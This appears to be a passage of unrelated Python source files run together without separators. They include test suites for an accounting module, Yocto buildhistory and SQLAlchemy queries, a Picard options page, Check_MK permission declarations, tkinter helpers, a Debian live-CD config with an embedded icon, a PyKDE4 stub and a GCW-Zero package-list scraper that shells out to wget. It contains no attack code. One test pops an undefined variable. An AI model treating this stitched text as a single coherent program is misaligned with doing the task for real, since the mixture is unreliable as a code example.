        assert all([m in meth for m in ("getCardReader", "logTransactionAction", "updateCredLimit",
            "generateTaxes", "roundValue", "getOriginType", "bring", "getXML", "createField")])
        assert meth["fieldIsEditable"][0] == "self"
        assert meth["fieldIsEditable"][1] == "fieldname"
        assert meth["fieldIsEditable"][2] == {"rowfieldname":'None'}
        assert meth["fieldIsEditable"][3] == {"rownr":'None'}

        attr, meth = getClassInfo("User")
        assert attr["buffer"] == "RecordBuffer"
        assert all([m in meth for m in ("store", "save", "load", "hasField")])

def test_suite():
    suite = unittest.TestSuite()
    suite.addTest(unittest.makeSuite(TestFuncs))
    return suite

if __name__ == '__main__':
    unittest.main(defaultTest='test_suite')

# -*- coding: utf-8 -*-


def outfit():
    collection = []

    for _ in range(0, 5):
        collection.append("Item{}".format(_))

    return {
        "data": collection,
    }


api = [
    ('/outfit', 'outfit', outfit),
]

import os
import unittest
import tempfile
from git import Repo
from oeqa.utils.commands import get_bb_var
from oe.buildhistory_analysis import blob_to_dict, compare_dict_blobs

class TestBlobParsing(unittest.TestCase):

    def setUp(self):
        import time
        self.repo_path = tempfile.mkdtemp(prefix='selftest-buildhistory',
            dir=get_bb_var('TOPDIR'))

        self.repo = Repo.init(self.repo_path)
        self.test_file = "test"
        self.var_map = {}

    def tearDown(self):
        import shutil
        shutil.rmtree(self.repo_path)

    def commit_vars(self, to_add={}, to_remove = [], msg="A commit message"):
        if len(to_add) == 0 and len(to_remove) == 0:
            return

        for k in to_remove:
            self.var_map.pop(x,None)
        for k in to_add:
            self.var_map[k] = to_add[k]

        with open(os.path.join(self.repo_path, self.test_file), 'w') as repo_file:
            for k in self.var_map:
                repo_file.write("%s = %s\n" % (k, self.var_map[k]))

        self.repo.git.add("--all")
        self.repo.git.commit(message=msg)

    def test_blob_to_dict(self):
        """
        Test convertion of git blobs to dictionary
        """
        valuesmap = { "foo" : "1", "bar" : "2" }
        self.commit_vars(to_add = valuesmap)

        blob = self.repo.head.commit.tree.blobs[0]
        self.assertEqual(valuesmap, blob_to_dict(blob),
            "commit was not translated correctly to dictionary")

    def test_compare_dict_blobs(self):
        """
        Test comparisson of dictionaries extracted from git blobs
        """
        changesmap = { "foo-2" : ("2", "8"), "bar" : ("","4"), "bar-2" : ("","5")}

        self.commit_vars(to_add = { "foo" : "1", "foo-2" : "2", "foo-3" : "3" })
        blob1 = self.repo.heads.master.commit.tree.blobs[0]

        self.commit_vars(to_add = { "foo-2" : "8", "bar" : "4", "bar-2" : "5" })
        blob2 = self.repo.heads.master.commit.tree.blobs[0]

        change_records = compare_dict_blobs(os.path.join(self.repo_path, self.test_file),
            blob1, blob2, False, False)

        var_changes = { x.fieldname : (x.oldvalue, x.newvalue) for x in change_records}
        self.assertEqual(changesmap, var_changes, "Changes not reported correctly")

    def test_compare_dict_blobs_default(self):
        """
        Test default values for comparisson of git blob dictionaries
        """
        defaultmap = { x : ("default", "1")  for x in ["PKG", "PKGE", "PKGV", "PKGR"]}

        self.commit_vars(to_add = { "foo" : "1" })
        blob1 = self.repo.heads.master.commit.tree.blobs[0]

        self.commit_vars(to_add = { "PKG" : "1", "PKGE" : "1", "PKGV" : "1", "PKGR" : "1" })
        blob2 = self.repo.heads.master.commit.tree.blobs[0]

        change_records = compare_dict_blobs(os.path.join(self.repo_path, self.test_file),
            blob1, blob2, False, False)

        var_changes = {}
        for x in change_records:
            oldvalue = "default" if ("default" in x.oldvalue) else x.oldvalue
            var_changes[x.fieldname] = (oldvalue, x.newvalue)

        self.assertEqual(defaultmap, var_changes, "Defaults not set properly")

# -*- coding: utf-8 -*-
#
# Picard, the next-generation MusicBrainz tagger
# Copyright (C) 2006 Lukáš Lalinský
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.

import re
from PyQt5 import QtWidgets
from picard import config
from picard.plugin import ExtensionPoint


class OptionsCheckError(Exception):

    def __init__(self, title, info):
        self.title = title
        self.info = info


class OptionsPage(QtWidgets.QWidget):

    PARENT = None
    SORT_ORDER = 1000
    ACTIVE = True
    STYLESHEET_ERROR = "QWidget { background-color: #f55; color: white; font-weight:bold }"
    STYLESHEET = "QLabel { qproperty-wordWrap: true; }"

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.setStyleSheet(self.STYLESHEET)

    def info(self):
        raise NotImplementedError

    def check(self):
        pass

    def load(self):
        pass

    def save(self):
        pass

    def restore_defaults(self):
        try:
            options = self.options
        except AttributeError:
            return
        old_options = {}
        for option in options:
            if option.section == 'setting':
                old_options[option.name] = config.setting[option.name]
                config.setting[option.name] = option.default
        self.load()
        # Restore the config values incase the user doesn't save after restoring defaults
        for key in old_options:
            config.setting[key] = old_options[key]

    def display_error(self, error):
        dialog = QtWidgets.QMessageBox(QtWidgets.QMessageBox.Warning, error.title, error.info, QtWidgets.QMessageBox.Ok, self)
        dialog.exec_()

    def init_regex_checker(self, regex_edit, regex_error):
        """
        regex_edit : a widget supporting text() and textChanged() methods, ie
        QLineEdit
        regex_error : a widget supporting setStyleSheet() and setText() methods,
        ie. QLabel
        """

        def check():
            try:
                re.compile(regex_edit.text())
            except re.error as e:
                raise OptionsCheckError(_("Regex Error"), string_(e))

        def live_checker(text):
            regex_error.setStyleSheet("")
            regex_error.setText("")
            try:
                check()
            except OptionsCheckError as e:
                regex_error.setStyleSheet(self.STYLESHEET_ERROR)
                regex_error.setText(e.info)

        regex_edit.textChanged.connect(live_checker)


_pages = ExtensionPoint()


def register_options_page(page_class):
    _pages.register(page_class.__module__, page_class)

#!/usr/bin/python
# -*- encoding: utf-8; py-indent-offset: 4 -*-
# +------------------------------------------------------------------+
# |             ____ _               _        __  __ _  __           |
# |            / ___| |__   ___  ___| | __   |  \/  | |/ /           |
# |           | |   | '_ \ / _ \/ __| |/ /   | |\/| | ' /            |
# |           | |___| | | |  __/ (__|   <    | |  | | . \            |
# |            \____|_| |_|\___|\___|_|\_\___|_|  |_|_|\_\           |
# |                                                                  |
# | Copyright Mathias Kettner 2014             mk@mathias-kettner.de |
# +------------------------------------------------------------------+
#
# This file is part of Check_MK.
# The official homepage is at http://mathias-kettner.de/check_mk.
#
# check_mk is free software;  you can redistribute it and/or modify it
# under the  terms of the  GNU General Public License  as published by
# the Free Software Foundation in version 2.  check_mk is  distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY;  with-
# out even the implied warranty of  MERCHANTABILITY  or  FITNESS FOR A
# PARTICULAR PURPOSE. See the  GNU General Public License for more de-
# ails.  You should have  received  a copy of the  GNU  General Public
# License along with GNU Make; see the file  COPYING.  If  not,  write
# to the Free Software Foundation, Inc., 51 Franklin St,  Fifth Floor,
# Boston, MA 02110-1301 USA.

import config
loaded_with_language = False

#   .----------------------------------------------------------------------.
#   |        ____                     _         _                          |
#   |       |  _ \ ___ _ __ _ __ ___ (_)___ ___(_) ___  _ __  ___          |
#   |       | |_) / _ \ '__| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __|         |
#   |       |  __/  __/ |  | | | | | | \__ \__ \ | (_) | | | \__ \         |
#   |       |_|   \___|_|  |_| |_| |_|_|___/___/_|\___/|_| |_|___/         |
#   |                                                                      |
#   +----------------------------------------------------------------------+
#   | Declare general permissions for Multisite                            |
#   '----------------------------------------------------------------------'

def load():
    global loaded_with_language
    if loaded_with_language == current_language:
        return

    config.declare_permission_section("general", _('General Permissions'), 10)

    config.declare_permission("general.use",
         _("Use Multisite at all"),
         _("Users without this permission are not let in at all"),
         [ "admin", "user", "guest" ])

    config.declare_permission("general.see_all",
         _("See all Nagios objects"),
         _("See all objects regardless of contacts and contact groups. "
           "If combined with 'perform commands' then commands may be done on all objects."),
         [ "admin", "guest" ])

    declare_visual_permissions('views', _("views"))
    declare_visual_permissions('dashboards', _("dashboards"))

    config.declare_permission("general.view_option_columns",
         _("Change view display columns"),
         _("Interactively change the number of columns being displayed by a view (does not edit or customize the view)"),
         [ "admin", "user", "guest" ])

    config.declare_permission("general.view_option_refresh",
         _("Change view display refresh"),
         _("Interactively change the automatic browser reload of a view being displayed (does not edit or customize the view)"),
         [ "admin", "user" ])

    config.declare_permission("general.painter_options",
         _("Change column display options"),
         _("Some of the display columns offer options for customizing their output. "
         "For example time stamp columns can be displayed absolute, relative or "
         "in a mixed style. This permission allows the user to modify display options"),
         [ "admin", "user", "guest" ])

    config.declare_permission("general.act",
         _("Perform commands"),
         _("Allows users to perform Nagios commands. If no further permissions "
           "are granted, actions can only be done on objects one is a contact for"),
         [ "admin", "user" ])

    config.declare_permission("general.see_sidebar",
         _("Use Check_MK sidebar"),
         _("Without this permission the Check_MK sidebar will be invisible"),
         [ "admin", "user", "guest" ])

    config.declare_permission("general.configure_sidebar",
         _("Configure sidebar"),
         _("This allows the user to add, move and remove sidebar snapins."),
         [ "admin", "user" ])

    config.declare_permission('general.edit_profile',
        _('Edit the user profile'),
        _('Permits the user to change the user profile settings.'),
        [ 'admin', 'user' ]
    )

    config.declare_permission('general.edit_notifications',
        _('Edit personal notification settings'),
        _('This allows a user to edit his personal notification settings. You also need the permission '
          '<i>Edit the user profile</i> in order to do this.'),
        [ 'admin', 'user' ]
    )

    config.declare_permission('general.disable_notifications',
        _('Disable all personal notifications'),
        _('This permissions provides a checkbox in the personal settings of the user that '
          'allows him to completely disable all of his notifications. Use with caution.'),
        [ 'admin', ]
    )

    config.declare_permission('general.edit_user_attributes',
        _('Edit personal user attributes'),
        _('This allows a user to edit his personal user attributes. You also need the permission '
          '<i>Edit the user profile</i> in order to do this.'),
        [ 'admin', 'user' ]
    )

    config.declare_permission('general.change_password',
        _('Edit the user password'),
        _('Permits the user to change the password.'),
        [ 'admin', 'user' ]
    )

    config.declare_permission('general.logout',
        _('Logout'),
        _('Permits the user to logout.'),
        [ 'admin', 'user', 'guest' ]
    )

    config.declare_permission("general.ignore_soft_limit",
         _("Ignore soft query limit"),
         _("Allows to ignore the soft query limit imposed upon the number of datasets returned by a query"),
         [ "admin", "user" ])

    config.declare_permission("general.ignore_hard_limit",
         _("Ignore hard query limit"),
         _("Allows to ignore the hard query limit imposed upon the number of datasets returned by a query"),
         [ "admin" ])

    loaded_with_language = current_language

# TODO: This has been obsoleted by pagetypes.py
def declare_visual_permissions(what, what_plural):
    config.declare_permission("general.edit_" + what,
         _("Customize %s and use them") % what_plural,
         _("Allows to create own %s, customize builtin %s and use them.") % (what_plural, what_plural),
         [ "admin", "user" ])

    config.declare_permission("general.publish_" + what,
         _("Publish %s") % what_plural,
         _("Make %s visible and usable for other users.") % what_plural,
         [ "admin", "user" ])

    config.declare_permission("general.see_user_" + what,
         _("See user %s") % what_plural,
         _("Is needed for seeing %s that other users have created.") % what_plural,
         [ "admin", "user", "guest" ])

    config.declare_permission("general.force_" + what,
         _("Modify builtin %s") % what_plural,
         _("Make own published %s override builtin %s for all users.") % (what_plural, what_plural),
         [ "admin" ])

    config.declare_permission("general.delete_foreign_" + what,
         _("Delete foreign %s") % what_plural,
         _("Allows to delete %s created by other users.") % what_plural,
         [ "admin" ])

import tkinter

FRAME_BORDER = 5


class PageView(object):
    __root = None

    bd = None

    def __init__(self, root=None, main_frame=None):
        param = self.params()
        if root is None:
            # standalone
            self.__root = tkinter.Tk()
            self.__root.title(param['title'])
            self.__root.geometry('%sx%s+%s+%s' % (param['w'],
                                                  param['h'],
                                                  param['x'],
                                                  param['y']
                                                  ))
        else:
            # inside
            self.__root = root

        self.bd = param['bd']

        if main_frame is None:
            # standalone
            main_f = tkinter.Frame(master=self.__root, bg='black', bd=self.bd)
            main_f.pack(fill='both', expand=True)
        else:
            # inside
            main_f = main_frame

        self.make_widgets(main_f)

    @property
    def root(self):
        return self.__root

    def close(self):
        self.__root.destroy()
        self.__root.quit()

    # Override
    def make_widgets(self, main_frame):
        pass

    # Override
    def params(self):
        param = {
            'x': 0,
            'y': 0,
            'w': 500,
            'h': 500,
            'title': '% Type Prog Title Here %',
        }
        return param


def mk_scrollable_area(obj, obj_frame, sbars):
    obj.grid(row=0, column=0, sticky='NSWE')

    if 'y' in sbars:
        y_scrollbar = tkinter.ttk.Scrollbar(obj_frame)
        y_scrollbar.grid(row=0, column=1, sticky='NS')
        y_scrollbar['command'] = obj.yview
        obj['yscrollcommand'] = y_scrollbar.set
    if 'x' in sbars:
        x_scrollbar = tkinter.ttk.Scrollbar(obj_frame, orient='horizontal')
        x_scrollbar.grid(row=1, column=0, sticky='WE')
        x_scrollbar['command'] = obj.xview
        obj['xscrollcommand'] = x_scrollbar.set

    obj_frame.columnconfigure(1, 'minsize')
    obj_frame.columnconfigure(0, weight=1)
    obj_frame.rowconfigure(1, 'minsize')
    obj_frame.rowconfigure(0, weight=1)


def mk_listbox(frame, side='top', sbars='y', sel_mode=tkinter.EXTENDED):
    BORDER = 0
    COLOR = 'grey'

    listbox_frame = tkinter.Frame(frame, bg=COLOR, bd=BORDER)
    listbox_frame.pack(side=side, fill='both', expand=True)

    listbox = tkinter.Listbox(listbox_frame, selectmode=sel_mode)
    mk_scrollable_area(listbox, listbox_frame, sbars)
    return listbox


def mk_treeview(frame, side='top', sbars='y'):
    BORDER = 0
    COLOR = 'grey'

    treeview_frame = tkinter.Frame(frame, bg=COLOR, bd=BORDER)
    treeview_frame.pack(side=side, fill='both', expand=True)

    treeview = tkinter.ttk.Treeview(treeview_frame)
    mk_scrollable_area(treeview, treeview_frame, sbars)

    return treeview


import os, socket, sys, urllib

from wx.lib.embeddedimage import PyEmbeddedImage

ldc_name = "Live Debian Creator"
ldc_cli_version = "1.4.0"
ldc_gui_version = "1.11.0"

if (sys.platform == "win32"):
    slash = "\\"
    if os.path.isfile(sys.path[0]): #fix for compiled binaries
        homepath = os.path.dirname(sys.path[0]) + slash
    else:
        homepath = sys.path[0] + slash
else:
    slash = "/"

#socket.setdefaulttimeout(10)

def defineBrowserAgent(uiname, uiversion):
    class AppURLopener(urllib.FancyURLopener):
        version = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
        #version = uiname + " " + uiversion + " / " + sys.platform
    urllib._urlopener = AppURLopener()

bookico = PyEmbeddedImage(
    "iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAABHNCSVQICAgIfAhkiAAABPZJ"
    "REFUWIWtl09sFFUcxz/iYN+YTZyNxewiTWiV6FZQtqhkN3pgGw6UW6unJVxEDtaThJMc9WLg"
    "oj1hwJhANURqQkw9NGwTla0c6JqArELSMVCzi63uKJX5UR7Bw8x0Z2d3yxJ5yctM3vu93/f7"
    "+ztv4CGPqamp9A/nL2Q6lTceBqht26pw7kL+7K+10S/tJ9OpBBPASCdnH/k/wFNTU+nzc/+M"
    "2v925a2N21Sq1yKJg/wxV7XWyIHBnYPjD53A9PS0mrv+e/6yw6gT60+72iK7AVJJSBoCBihD"
    "AVC6WK7O3bx3+thFyY30ycSH7+w5FNXXcQgymUzaei49+vHMX/kq/SqpYGiDRbYHlBFoigMu"
    "gklxHsZ1NlG4yygvKiruWauV3vsS2L59e+qZVwfHqsnB3G8LkI2ZHHzdImGBaZi+BgVaqIhi"
    "sqo4uQBlrQDPI2jx5gMQUFu39A3veW3ru9leMmO19aQ2JDm8C5SCuDJBgUJRM6DkKE5WFYUF"
    "cLSAxgOnNeiqBHZt6z2wO2UdSvXGrfimFNYrIzhHbca/LlOcTzL0coJsj8IRKC4pJhfAXvKB"
    "dKBFQu+AdjsnsG/AOpzc+RZWKkc8FgcFGDYApas1SgtAUjxXJOK+a1XUgRHrzc4JlMslqB5C"
    "ZYbg+Sws2rAYByPlSQcntNQtNSLaNGCoxv07HRJAQ63ioM6MI2fGPdt6DngKDbVK1kS9IKBV"
    "PQmN6P4qBNAgGlw/jqJp9vKKBtVILrA4nA+GegAPBCT8Z0P6RF0dvAfgwdRRIu2rYfU+sLKr"
    "mtcCq3UIPGyABmupzIBRoOIkuXzF7oyACq2KDne5FmQC2fC+UyWtZxmIlchtseg1sti2yzf2"
    "z8n8559kdmzbYW/evLnalgAGmLr+Lp00aw3WYomUUaDfKpNJphmIDWEZXvd1N9m80HNj+Fs5"
    "Pvx0TY0AE6sQUGB45SOA0m0kwyWnHfLdh8nGd5NJDGMqEwyXoi5QXJrAltmVsNxabq2mrWVi"
    "qHoitkpCBJwKp6uTVDbaVGKziK5wWWaQoAOGu2IbO5pGkLfuKocD5WrJwVRQXirjXC+DAdY6"
    "1ZSYCng8cnxNk8K1fukF/eA+FqAFpIaiMT0VXgIr5fcohUfosca23EzgTh3cDep5taFdcCN1"
    "bviAMTB98OZqakfAH65vx4rqKBlNm2+8grUeWGCrGW5S9yWwti7ofW5Ucx9rIBK6bIRB2lVN"
    "Y29tQcBonG4Ta6k/NSBeDkSH2Sp0GoiUYYsQ+AB+0rTt4hov/lpQ0lrKDT/F66y3IjLN9rmh"
    "VQVo1b4StHgkWhAIEjioKBFfx91GFzR5wJ5HRINpem3YQfzyklAihgCjxDT1SvLvLLLkR0rA"
    "jdzOmjxwotbVf656+/20YmS9wrIfvSdO8p53A0UAM0RihVqIjNSB/WXRIFpwXVhebgxCkwdu"
    "/33b/kXY94VD/KWPjvY9lduVvaWxCVzYYipxW1eKFhwRajcdat9RemP+vd2jbx6cCIt19Gf0"
    "6fETw28fKR6jf9Ci24LuuFeuMWC2IIlLXxVl70+5ZDckuxWuFuIxqIjgTDOjzvV9UC7OTbbS"
    "3fGvmW3bauyzE/nCFXe4dIMsy45tVX889oT+83RXV5d5bf21MXIyZD3re2WGgnyfOFK9VG0J"
    "/MAEOhmnTp1KXF28mlsXWzezf+/+1legyPgPTicVRBS2XfsAAAAASUVORK5CYII=")
getbookicoIcon = bookico.GetIcon
# encoding: utf-8
# module PyKDE4.kdeui
# from /usr/lib/python3/dist-packages/PyKDE4/kdeui.cpython-34m-x86_64-linux-gnu.so
# by generator 1.135
# no doc

# imports
import PyKDE4.kdecore as __PyKDE4_kdecore
import PyQt4.QtCore as __PyQt4_QtCore
import PyQt4.QtGui as __PyQt4_QtGui
import PyQt4.QtSvg as __PyQt4_QtSvg


class KPassivePopupMessageHandler(__PyQt4_QtCore.QObject, __PyKDE4_kdecore.KMessageHandler):
    # no doc
    def message(self, *args, **kwargs): # real signature unknown
        pass

    def __init__(self, *args, **kwargs): # real signature unknown
        pass



#!/usr/bin/python
#CHANGE ONLY, IF YOU KNOW, WHAT YOU DO!
#OPKMANAGER WILL CRASH IF YOUR OUTPUT IS INVALID!
import subprocess
import argparse
import time
import calendar
import string
import sys

class RegisterAction(argparse.Action):
	def __call__(self, parser, namespace, values, option_string=None):
		print "Official Repository" # Name
		print "web" # Type (maybe web for web, or anything else for usb)
		print "http://www.gcw-zero.com/files/upload/opk/" #URL
		print "official.py --update" #Call for updating the list
		print "O" #letter to show

class UpdateAction(argparse.Action):
	def __call__(self, parser, namespace, values, option_string=None):
		process = subprocess.Popen('wget --timeout='+str(values[0])+' -qO- http://ziz.gp2x.de/gcw-repos/count.php',stdout=subprocess.PIPE,shell=True)
		process = subprocess.Popen('wget --timeout='+str(values[0])+' -qO- http://www.gcw-zero.com/downloads',stdout=subprocess.PIPE,shell=True)
		#process = subprocess.Popen('wget --timeout='+str(values[0])+' -qO- http://ziz.gp2x.de/temp/test.htm',stdout=subprocess.PIPE,shell=True)
		#process = subprocess.Popen('cat downloads',stdout=subprocess.PIPE,shell=True)
		output = process.stdout.read().split('<div class="downloads_overview">')
		for output_part in output:
			part = output_part.split('\n')
			line_number = 0;
			not_found = 1;
			while (line_number < len(part)):
				if (part[line_number].strip().startswith('<span class="downloads_title">')):
					not_found = 0;
					break;
				line_number += 1;
			if not_found:
				continue;
			program_name_description = part[line_number];
			name = program_name_description.split('>')[1].split('<')[0];
			if (name == ""):
				continue
			line_number = 0;
			not_found = 1;
			while (line_number < len(part)):
				if (part[line_number].strip().startswith('<a class="downloads_link"')):
					not_found = 0;
					break;
				line_number += 1;
			if not_found:
				continue;
			filename = part[line_number].split('href="file.php?file=')[1].split('">')[0];
			print "["+name+"]"
			description = program_name_description.split('>')[3];
			print "description: "+description
			print "filename: " + filename
			l = len(part)
			found_version = 0
			found_image = 0
			found_long = 0;
			for i in range(0,l-1):
				if string.find(part[i],'Publication Date') != -1:
					version = part[i+1]
					version = version.split('>')[1]
					version = version.split('<')[0]
					t = time.strptime(version,"%A, %d %b %Y")
					print "version: " + str(calendar.timegm(t)) #NEEDED!
					found_version = 1
				if string.find(part[i],'<div class="downloads_preview"') != -1:
					image = part[i];
					image = image.split("background-image: url('")[1].split("');")[0];
					print "image_url: http://www.gcw-zero.com/" + image
				if string.find(part[i],'<p class="more fade">') != -1:
					long_description = part[i];
					long_description = long_description.split('<p class="more fade">')[1].split("</p>")[0];
					long_description = long_description.replace('<br /> ','\\n')
					long_description = long_description.split('>')
					sys.stdout.write("long_description: ")
					for long_description_part in long_description:
						sys.stdout.write(long_description_part.split('<')[0])
					sys.stdout.write('\n')
					found_long = 1
				if (found_version and found_image and found_long):
					break
			print ""


def main():
	parser = argparse.ArgumentParser(description="Ziz's Repository script")
	parser.add_argument('--register', nargs=0, action=RegisterAction)
	parser.add_argument('--update', nargs=1, action=UpdateAction)
	args = parser.parse_args()

if __name__ == "__main__":
	main()

#!/usr/bin/env python

####################################
#
# --- TEXTPATGEN TEMPLATE ---
#
# Users can change the output by editing
# this file directly.
#
####################################

import sys

sys.stdout.write('####################################\n')
sys.stdout.write('#\n')
sys.stdout.write('# -- TEXTPATGEN GENERATED FILE --\n')
sys.stdout.write('#\n')
sys.stdout.write('# -- Created from a Python script.\n')
sys.stdout.write('#\n')
sys.stdout.write("####################################\n")
num=0
for length in range(0, 16):
  for width in range(0, 15):
    sys.stdout.write('X-%04X ' % num)
    num=num+1
    width=width+1
    length=length+1
  sys.stdout.write('X-%04X\n' % num)
  num=num+1
sys.stdout.write('# -- End of file.\n');
sys.stdout.flush()

from .. import config
from .. import fixtures
from ..assertions import eq_
from ..assertions import in_
from ..schema import Column
from ..schema import Table
from ... import bindparam
from ... import case
from ... import Computed
from ... import exists
from ... import false
from ... import func
from ... import Integer
from ... import literal
from ... import literal_column
from ... import null
from ... import select
from ... import String
from ... import testing
from ... import text
from ... import true
from ... import tuple_
from ... import union
from ... import util


class CollateTest(fixtures.TablesTest):
    __backend__ = True

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "some_table",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("data", String(100)),
        )

    @classmethod
    def insert_data(cls, connection):
        connection.execute(
            cls.tables.some_table.insert(),
            [
                {"id": 1, "data": "collate data1"},
                {"id": 2, "data": "collate data2"},
            ],
        )

    def _assert_result(self, select, result):
        eq_(config.db.execute(select).fetchall(), result)

    @testing.requires.order_by_collation
    def test_collate_order_by(self):
        collation = testing.requires.get_order_by_collation(testing.config)

        self._assert_result(
            select([self.tables.some_table]).order_by(
                self.tables.some_table.c.data.collate(collation).asc()
            ),
            [(1, "collate data1"), (2, "collate data2")],
        )


class OrderByLabelTest(fixtures.TablesTest):
    """Test the dialect sends appropriate ORDER BY expressions when
    labels are used.

    This essentially exercises the "supports_simple_order_by_label"
    setting.

    """

    __backend__ = True

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "some_table",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("x", Integer),
            Column("y", Integer),
            Column("q", String(50)),
            Column("p", String(50)),
        )

    @classmethod
    def insert_data(cls, connection):
        connection.execute(
            cls.tables.some_table.insert(),
            [
                {"id": 1, "x": 1, "y": 2, "q": "q1", "p": "p3"},
                {"id": 2, "x": 2, "y": 3, "q": "q2", "p": "p2"},
                {"id": 3, "x": 3, "y": 4, "q": "q3", "p": "p1"},
            ],
        )

    def _assert_result(self, select, result):
        eq_(config.db.execute(select).fetchall(), result)

    def test_plain(self):
        table = self.tables.some_table
        lx = table.c.x.label("lx")
        self._assert_result(select([lx]).order_by(lx), [(1,), (2,), (3,)])

    def test_composed_int(self):
        table = self.tables.some_table
        lx = (table.c.x + table.c.y).label("lx")
        self._assert_result(select([lx]).order_by(lx), [(3,), (5,), (7,)])

    def test_composed_multiple(self):
        table = self.tables.some_table
        lx = (table.c.x + table.c.y).label("lx")
        ly = (func.lower(table.c.q) + table.c.p).label("ly")
        self._assert_result(
            select([lx, ly]).order_by(lx, ly.desc()),
            [(3, util.u("q1p3")), (5, util.u("q2p2")), (7, util.u("q3p1"))],
        )

    def test_plain_desc(self):
        table = self.tables.some_table
        lx = table.c.x.label("lx")
        self._assert_result(
            select([lx]).order_by(lx.desc()), [(3,), (2,), (1,)]
        )

    def test_composed_int_desc(self):
        table = self.tables.some_table
        lx = (table.c.x + table.c.y).label("lx")
        self._assert_result(
            select([lx]).order_by(lx.desc()), [(7,), (5,), (3,)]
        )

    @testing.requires.group_by_complex_expression
    def test_group_by_composed(self):
        table = self.tables.some_table
        expr = (table.c.x + table.c.y).label("lx")
        stmt = (
            select([func.count(table.c.id), expr])
            .group_by(expr)
            .order_by(expr)
        )
        self._assert_result(stmt, [(1, 3), (1, 5), (1, 7)])


class LimitOffsetTest(fixtures.TablesTest):
    __backend__ = True

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "some_table",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("x", Integer),
            Column("y", Integer),
        )

    @classmethod
    def insert_data(cls, connection):
        connection.execute(
            cls.tables.some_table.insert(),
            [
                {"id": 1, "x": 1, "y": 2},
                {"id": 2, "x": 2, "y": 3},
                {"id": 3, "x": 3, "y": 4},
                {"id": 4, "x": 4, "y": 5},
            ],
        )

    def _assert_result(self, select, result, params=()):
        eq_(config.db.execute(select, params).fetchall(), result)

    def test_simple_limit(self):
        table = self.tables.some_table
        self._assert_result(
            select([table]).order_by(table.c.id).limit(2),
            [(1, 1, 2), (2, 2, 3)],
        )

    @testing.requires.offset
    def test_simple_offset(self):
        table = self.tables.some_table
        self._assert_result(
            select([table]).order_by(table.c.id).offset(2),
            [(3, 3, 4), (4, 4, 5)],
        )

    @testing.requires.offset
    def test_simple_limit_offset(self):
        table = self.tables.some_table
        self._assert_result(
            select([table]).order_by(table.c.id).limit(2).offset(1),
            [(2, 2, 3), (3, 3, 4)],
        )

    @testing.requires.offset
    def test_limit_offset_nobinds(self):
        """test that 'literal binds' mode works - no bound params."""

        table = self.tables.some_table
        stmt = select([table]).order_by(table.c.id).limit(2).offset(1)
        sql = stmt.compile(
            dialect=config.db.dialect, compile_kwargs={"literal_binds": True}
        )
        sql = str(sql)

        self._assert_result(sql, [(2, 2, 3), (3, 3, 4)])

    @testing.requires.bound_limit_offset
    def test_bound_limit(self):
        table = self.tables.some_table
        self._assert_result(
            select([table]).order_by(table.c.id).limit(bindparam("l")),
            [(1, 1, 2), (2, 2, 3)],
            params={"l": 2},
        )

    @testing.requires.bound_limit_offset
    def test_bound_offset(self):
        table = self.tables.some_table
        self._assert_result(
            select([table]).order_by(table.c.id).offset(bindparam("o")),
            [(3, 3, 4), (4, 4, 5)],
            params={"o": 2},
        )

    @testing.requires.bound_limit_offset
    def test_bound_limit_offset(self):
        table = self.tables.some_table
        self._assert_result(
            select([table])
            .order_by(table.c.id)
            .limit(bindparam("l"))
            .offset(bindparam("o")),
            [(2, 2, 3), (3, 3, 4)],
            params={"l": 2, "o": 1},
        )


class CompoundSelectTest(fixtures.TablesTest):
    __backend__ = True

    @classmethod
    def define_tables(cls, metadata):
        Table(
            "some_table",
            metadata,
            Column("id", Integer, primary_key=True),
            Column("x", Integer),
            Column("y", Integer),
        )

    @classmethod
    def insert_data(cls, connection):
        connection.execute(
            cls.tables.some_table.insert(),
            [
                {"id": 1, "x": 1, "y": 2},
                {"id": 2, "x": 2, "y": 3},
                {"id": 3, "x": 3, "y": 4},
                {"id": 4, "x": 4, "y": 5},
            ],
        )

    def _assert_result(self, select, result, params=()):
        eq_(config.db.execute(select, params).fetchall(), result)

    def test_plain_union(self):
        table = self.tables.some_table
        s1 = select([table]).where(table.c.id == 2)
        s2 = select([table]).where(table.c.id == 3)

        u1 = union(s1, s2)
        self._assert_result(u1.order_by(u1.c.id), [(2, 2, 3), (3, 3, 4)])

    def test_select_from_plain_union(self):
        table = self.tables.some_table
        s1 = select([table]).where(table.c.id == 2)
        s2 = select([table]).where(table.c.id == 3)

        u1 = union(s1, s2).alias().select()
        self._assert_result(u1.order_by(u1.c.id), [(2, 2, 3), (3, 3, 4)])

    @testing.requires.order_by_col_from_union
    @testing.requires.parens_in_union_contained_select_w_limit_offset
    def test_limit_offset_selectable_in_unions(self):
        table = self.tables.some_table
        s1 = (
            select([table])
            .where(table.c.id == 2)
            .limit(1)
            .order_by(table.c.id)
        )
        s2 = (
            select([table])
            .where(table.c.id == 3)
            .limit(1)
            .order_by(table.c.id)
        )

        u1 = union(s1, s2).limit(2)
        self._assert_result(u1.order_by(u1.c.id), [(2, 2, 3), (3, 3, 4)])

    @testing.requires.parens_in_union_contained_select_wo_limit_offset
    def test_order_by_selectable_in_unions(self):
        table = self.tables.some_table
        s1 = select([table]).where(table.c.id == 2).order_by(table.c.id)
        s2 = select([table]).where(table.c.id == 3).order_by(table.c.id)

        u1 = union(s1, s2).limit(2)
        self._assert_result(u1.order_by(u1.c.id), [(2, 2, 3), (3, 3, 4)])

    def test_distinct_selectable_in_unions(self):
        table = self.tables.some_table
        s1 = select([table]).where(table.c.id == 2).distinct()
